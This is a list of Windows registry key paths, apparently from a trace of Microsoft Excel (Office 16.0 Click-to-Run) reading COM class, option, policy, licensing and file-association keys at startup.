HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultPath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OpenDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAnimations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Xlstart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AltStartup
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\CoauthDebugMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\UserInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo\UserName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo\UserInitials
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_17407
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF\TrustedCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\AllowUserDefinedFileShareCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\DisableAllCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\DisableOMEXCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\RequireServerVerification
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\ExcelOMEXRefreshPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_AggregatedCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\PowerPivot\Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPivot\Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office Test\Special
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableCoauthLegacyVersionMitigation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\XLDesktopCoauthActive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotCheckIfOfficeIsHTMLEditor
HKEY_LOCAL_MACHINE\Software\Microsoft\Shared\HTML
HKEY_LOCAL_MACHINE\Software\Microsoft\Shared\MHTML
HKEY_CLASSES_ROOT\.htm
HKEY_LOCAL_MACHINE\Software\Classes\.htm\(Default)
HKEY_CLASSES_ROOT\htmlfile\shell
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command\(Default)
HKEY_CLASSES_ROOT\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_CLASSES_ROOT\.mht
HKEY_LOCAL_MACHINE\Software\Classes\.mht\(Default)
HKEY_CLASSES_ROOT\mhtmlfile\shell
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office Test\Idle Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Office Test\Idle Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\OnlinePollTimeMs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\DRM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DRM
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\OEM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Application Guard PreWarm
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\Software\Microsoft\MRUS\Profiles
HKEY_LOCAL_MACHINE\Software\Microsoft\MRUS\Office365
HKEY_LOCAL_MACHINE\Software\FSLogix\Profiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\PolicyType
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Behavior
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\MergeAlgorithm
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirectMapped
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirect
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyname
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicypath
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyismultisz
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicymultiszSeparatorChar
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataUser
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataDevice
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataBoth
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\7DValue
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Value
HKEY_LOCAL_MACHINE\software\policies\Microsoft\AppHVSI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\PolicyManager\current\Device\AppHVSI
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\current\Device\AppHVSI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\ClickToRunLicensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ClickToRunLicensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFirstRunOptin
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Registration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EulasSetAccepted
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserCCSDisabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_CURRENT_USER\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\IsVailContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Input
HKEY_LOCAL_MACHINE\Software\Microsoft\Input
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Input\ResyncResetTime
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Input\MaxResyncAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Server
